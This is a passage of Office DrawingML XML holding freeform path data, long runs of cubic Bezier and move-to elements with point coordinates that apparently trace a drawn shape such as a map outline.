                    <a:pt x="348" y="173"/>
                    <a:pt x="348" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="178"/>
                    <a:pt x="349" y="178"/>
                    <a:pt x="351" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="177"/>
                    <a:pt x="351" y="177"/>
                    <a:pt x="351" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="178"/>
                    <a:pt x="351" y="178"/>
                    <a:pt x="351" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="181"/>
                    <a:pt x="349" y="183"/>
                    <a:pt x="352" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="184"/>
                    <a:pt x="353" y="184"/>
                    <a:pt x="353" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="180"/>
                    <a:pt x="353" y="180"/>
                    <a:pt x="354" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="179"/>
                    <a:pt x="355" y="178"/>
                    <a:pt x="355" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="177"/>
                    <a:pt x="354" y="175"/>
                    <a:pt x="354" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="174"/>
                    <a:pt x="353" y="174"/>
                    <a:pt x="352" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="173"/>
                    <a:pt x="352" y="173"/>
                    <a:pt x="352" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="172"/>
                    <a:pt x="353" y="172"/>
                    <a:pt x="354" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="172"/>
                    <a:pt x="356" y="170"/>
                    <a:pt x="358" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="169"/>
                    <a:pt x="361" y="170"/>
                    <a:pt x="362" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="169"/>
                    <a:pt x="363" y="169"/>
                    <a:pt x="363" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="170"/>
                    <a:pt x="362" y="170"/>
                    <a:pt x="362" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="170"/>
                    <a:pt x="361" y="170"/>
                    <a:pt x="361" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="170"/>
                    <a:pt x="360" y="171"/>
                    <a:pt x="359" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="171"/>
                    <a:pt x="358" y="171"/>
                    <a:pt x="358" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="171"/>
                    <a:pt x="356" y="171"/>
                    <a:pt x="355" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="173"/>
                    <a:pt x="356" y="175"/>
                    <a:pt x="356" y="176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58" y="176"/>
                    <a:pt x="359" y="175"/>
                    <a:pt x="359" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="175"/>
                    <a:pt x="360" y="174"/>
                    <a:pt x="360" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="173"/>
                    <a:pt x="362" y="173"/>
                    <a:pt x="362" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="171"/>
                    <a:pt x="362" y="171"/>
                    <a:pt x="362" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="171"/>
                    <a:pt x="363" y="171"/>
                    <a:pt x="363" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="173"/>
                    <a:pt x="365" y="173"/>
                    <a:pt x="365" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="173"/>
                    <a:pt x="366" y="171"/>
                    <a:pt x="367" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="171"/>
                    <a:pt x="368" y="171"/>
                    <a:pt x="367" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="168"/>
                    <a:pt x="367" y="168"/>
                    <a:pt x="367" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="168"/>
                    <a:pt x="372" y="168"/>
                    <a:pt x="374" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="167"/>
                    <a:pt x="377" y="167"/>
                    <a:pt x="377" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="163"/>
                    <a:pt x="376" y="162"/>
                    <a:pt x="376" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="160"/>
                    <a:pt x="376" y="159"/>
                    <a:pt x="376" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="157"/>
                    <a:pt x="376" y="157"/>
                    <a:pt x="376" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="157"/>
                    <a:pt x="376" y="157"/>
                    <a:pt x="376" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="156"/>
                    <a:pt x="375" y="155"/>
                    <a:pt x="375" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="154"/>
                    <a:pt x="375" y="154"/>
                    <a:pt x="376" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="153"/>
                    <a:pt x="376" y="148"/>
                    <a:pt x="375" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="145"/>
                    <a:pt x="372" y="139"/>
                    <a:pt x="369" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="138"/>
                    <a:pt x="369" y="138"/>
                    <a:pt x="369" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="370" y="138"/>
                    <a:pt x="371" y="138"/>
                    <a:pt x="371" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="137"/>
                    <a:pt x="372" y="137"/>
                    <a:pt x="372" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="137"/>
                    <a:pt x="372" y="137"/>
                    <a:pt x="372" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="138"/>
                    <a:pt x="374" y="138"/>
                    <a:pt x="374" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="138"/>
                    <a:pt x="375" y="138"/>
                    <a:pt x="377" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="138"/>
                    <a:pt x="377" y="138"/>
                    <a:pt x="376" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="136"/>
                    <a:pt x="378" y="136"/>
                    <a:pt x="379" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="135"/>
                    <a:pt x="379" y="135"/>
                    <a:pt x="380" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="134"/>
                    <a:pt x="379" y="133"/>
                    <a:pt x="379" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="131"/>
                    <a:pt x="380" y="131"/>
                    <a:pt x="381" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382" y="130"/>
                    <a:pt x="382" y="130"/>
                    <a:pt x="383" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="383" y="130"/>
                    <a:pt x="383" y="130"/>
                    <a:pt x="383" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384" y="129"/>
                    <a:pt x="384" y="129"/>
                    <a:pt x="384" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384" y="126"/>
                    <a:pt x="384" y="126"/>
                    <a:pt x="384" y="126"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="387" y="122"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="122"/>
                    <a:pt x="386" y="122"/>
                    <a:pt x="386" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="122"/>
                    <a:pt x="386" y="122"/>
                    <a:pt x="386" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="122"/>
                    <a:pt x="386" y="122"/>
                    <a:pt x="386" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="122"/>
                    <a:pt x="386" y="122"/>
                    <a:pt x="386" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="122"/>
                    <a:pt x="386" y="122"/>
                    <a:pt x="385" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385" y="123"/>
                    <a:pt x="385" y="123"/>
                    <a:pt x="385" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="124"/>
                    <a:pt x="386" y="124"/>
                    <a:pt x="386" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387" y="124"/>
                    <a:pt x="387" y="124"/>
                    <a:pt x="387" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387" y="123"/>
                    <a:pt x="387" y="123"/>
                    <a:pt x="387" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387" y="122"/>
                    <a:pt x="387" y="122"/>
                    <a:pt x="387" y="122"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="388" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="104"/>
                    <a:pt x="388" y="104"/>
                    <a:pt x="388" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="104"/>
                    <a:pt x="388" y="104"/>
                    <a:pt x="388" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="104"/>
                    <a:pt x="388" y="104"/>
                    <a:pt x="388" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="105"/>
                    <a:pt x="388" y="105"/>
                    <a:pt x="388" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="106"/>
                    <a:pt x="388" y="106"/>
                    <a:pt x="388" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="107"/>
                    <a:pt x="388" y="107"/>
                    <a:pt x="388" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="108"/>
                    <a:pt x="388" y="108"/>
                    <a:pt x="388" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="108"/>
                    <a:pt x="389" y="108"/>
                    <a:pt x="389" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="107"/>
                    <a:pt x="389" y="107"/>
                    <a:pt x="389" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="107"/>
                    <a:pt x="389" y="107"/>
                    <a:pt x="389" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="106"/>
                    <a:pt x="389" y="106"/>
                    <a:pt x="389" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="106"/>
                    <a:pt x="389" y="106"/>
                    <a:pt x="389" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="106"/>
                    <a:pt x="389" y="106"/>
                    <a:pt x="389" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="105"/>
                    <a:pt x="388" y="105"/>
                    <a:pt x="388" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="105"/>
                    <a:pt x="388" y="105"/>
                    <a:pt x="388" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="104"/>
                    <a:pt x="388" y="104"/>
                    <a:pt x="388" y="104"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="394" y="87"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="394" y="87"/>
                    <a:pt x="394" y="87"/>
                    <a:pt x="394" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="394" y="86"/>
                    <a:pt x="394" y="86"/>
                    <a:pt x="393" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="86"/>
                    <a:pt x="393" y="86"/>
                    <a:pt x="393" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="86"/>
                    <a:pt x="393" y="86"/>
                    <a:pt x="393" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="86"/>
                    <a:pt x="393" y="86"/>
                    <a:pt x="393" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="86"/>
                    <a:pt x="393" y="86"/>
                    <a:pt x="393" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="86"/>
                    <a:pt x="393" y="86"/>
                    <a:pt x="394" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="395" y="87"/>
                    <a:pt x="395" y="87"/>
                    <a:pt x="395" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="394" y="87"/>
                    <a:pt x="394" y="87"/>
                    <a:pt x="394" y="87"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="393" y="88"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="394" y="88"/>
                    <a:pt x="394" y="88"/>
                    <a:pt x="394" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="87"/>
                    <a:pt x="393" y="87"/>
                    <a:pt x="393" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="86"/>
                    <a:pt x="392" y="86"/>
                    <a:pt x="391" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="85"/>
                    <a:pt x="390" y="84"/>
                    <a:pt x="389" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="84"/>
                    <a:pt x="390" y="85"/>
                    <a:pt x="391" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="86"/>
                    <a:pt x="391" y="86"/>
                    <a:pt x="391" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="86"/>
                    <a:pt x="392" y="87"/>
                    <a:pt x="393" y="88"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="378" y="71"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="71"/>
                    <a:pt x="377" y="71"/>
                    <a:pt x="377" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="70"/>
                    <a:pt x="377" y="70"/>
                    <a:pt x="377" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="70"/>
                    <a:pt x="376" y="70"/>
                    <a:pt x="376" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="70"/>
                    <a:pt x="376" y="70"/>
                    <a:pt x="376" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="71"/>
                    <a:pt x="376" y="71"/>
                    <a:pt x="376" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="71"/>
                    <a:pt x="376" y="71"/>
                    <a:pt x="376" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="71"/>
                    <a:pt x="376" y="71"/>
                    <a:pt x="376" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="73"/>
                    <a:pt x="377" y="73"/>
                    <a:pt x="377" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="73"/>
                    <a:pt x="377" y="73"/>
                    <a:pt x="377" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="378" y="72"/>
                    <a:pt x="378" y="72"/>
                    <a:pt x="378" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="378" y="72"/>
                    <a:pt x="378" y="72"/>
                    <a:pt x="378" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="378" y="72"/>
                    <a:pt x="378" y="72"/>
                    <a:pt x="378" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="378" y="71"/>
                    <a:pt x="378" y="71"/>
                    <a:pt x="378" y="71"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="376" y="53"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="52"/>
                    <a:pt x="376" y="52"/>
                    <a:pt x="375" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="51"/>
                    <a:pt x="375" y="51"/>
                    <a:pt x="375" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                    <a:pt x="374" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="52"/>
                    <a:pt x="376" y="52"/>
                    <a:pt x="376" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="52"/>
                    <a:pt x="376" y="52"/>
                    <a:pt x="376" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                    <a:pt x="375" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="53"/>
                    <a:pt x="376" y="53"/>
                    <a:pt x="376" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="53"/>
                    <a:pt x="376" y="53"/>
                    <a:pt x="376" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="53"/>
                    <a:pt x="376" y="53"/>
                    <a:pt x="376" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="53"/>
                    <a:pt x="376" y="53"/>
                    <a:pt x="376" y="53"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="336" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="26"/>
                    <a:pt x="335" y="26"/>
                    <a:pt x="335" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="26"/>
                    <a:pt x="333" y="26"/>
                    <a:pt x="333" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="26"/>
                    <a:pt x="333" y="26"/>
                    <a:pt x="333" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="26"/>
                    <a:pt x="333" y="26"/>
                    <a:pt x="333" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="26"/>
                    <a:pt x="332" y="25"/>
                    <a:pt x="332" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="25"/>
                    <a:pt x="331" y="25"/>
                    <a:pt x="331" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="25"/>
                    <a:pt x="332" y="25"/>
                    <a:pt x="332" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="26"/>
                    <a:pt x="333" y="26"/>
                    <a:pt x="333" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="26"/>
                    <a:pt x="333" y="26"/>
                    <a:pt x="333" y="26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5" y="28"/>
                    <a:pt x="335" y="28"/>
                    <a:pt x="335" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="28"/>
                    <a:pt x="336" y="28"/>
                    <a:pt x="336" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27"/>
                    <a:pt x="335" y="27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36" y="27"/>
                    <a:pt x="336" y="27"/>
                    <a:pt x="336" y="27"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="296" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="18"/>
                    <a:pt x="295" y="18"/>
                    <a:pt x="294" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="17"/>
                    <a:pt x="294" y="17"/>
                    <a:pt x="294" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="17"/>
                    <a:pt x="293" y="17"/>
                    <a:pt x="293" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="17"/>
                    <a:pt x="293" y="17"/>
                    <a:pt x="293" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="17"/>
                    <a:pt x="293" y="17"/>
                    <a:pt x="293" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="17"/>
                    <a:pt x="292" y="17"/>
                    <a:pt x="292" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="17"/>
                    <a:pt x="292" y="17"/>
                    <a:pt x="292" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="17"/>
                    <a:pt x="292" y="17"/>
                    <a:pt x="292" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="17"/>
                    <a:pt x="291" y="17"/>
                    <a:pt x="291" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="16"/>
                    <a:pt x="290" y="16"/>
                    <a:pt x="290" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="17"/>
                    <a:pt x="290" y="17"/>
                    <a:pt x="290" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="17"/>
                    <a:pt x="290" y="17"/>
                    <a:pt x="290" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="17"/>
                    <a:pt x="290" y="17"/>
                    <a:pt x="290" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="17"/>
                    <a:pt x="290" y="17"/>
                    <a:pt x="288" y="16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9" y="17"/>
                    <a:pt x="289" y="17"/>
                    <a:pt x="290" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="291" y="18"/>
                    <a:pt x="291" y="18"/>
                    <a:pt x="292" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="18"/>
                    <a:pt x="292" y="18"/>
                    <a:pt x="292" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="18"/>
                    <a:pt x="293" y="18"/>
                    <a:pt x="293" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="18"/>
                    <a:pt x="293" y="18"/>
                    <a:pt x="293" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="18"/>
                    <a:pt x="294" y="18"/>
                    <a:pt x="294" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="19"/>
                    <a:pt x="294" y="19"/>
                    <a:pt x="294" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="19"/>
                    <a:pt x="295" y="19"/>
                    <a:pt x="296" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="19"/>
                    <a:pt x="296" y="19"/>
                    <a:pt x="296" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="19"/>
                    <a:pt x="296" y="19"/>
                    <a:pt x="296" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="19"/>
                    <a:pt x="296" y="19"/>
                    <a:pt x="296" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="18"/>
                    <a:pt x="295" y="18"/>
                    <a:pt x="295" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="18"/>
                    <a:pt x="295" y="18"/>
                    <a:pt x="295" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="18"/>
                    <a:pt x="296" y="18"/>
                    <a:pt x="296" y="18"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="297" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="22"/>
                    <a:pt x="295" y="22"/>
                    <a:pt x="294" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="22"/>
                    <a:pt x="294" y="22"/>
                    <a:pt x="294" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="22"/>
                    <a:pt x="294" y="22"/>
                    <a:pt x="294" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="22"/>
                    <a:pt x="293" y="22"/>
                    <a:pt x="293" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="21"/>
                    <a:pt x="292" y="21"/>
                    <a:pt x="292" y="21"/>
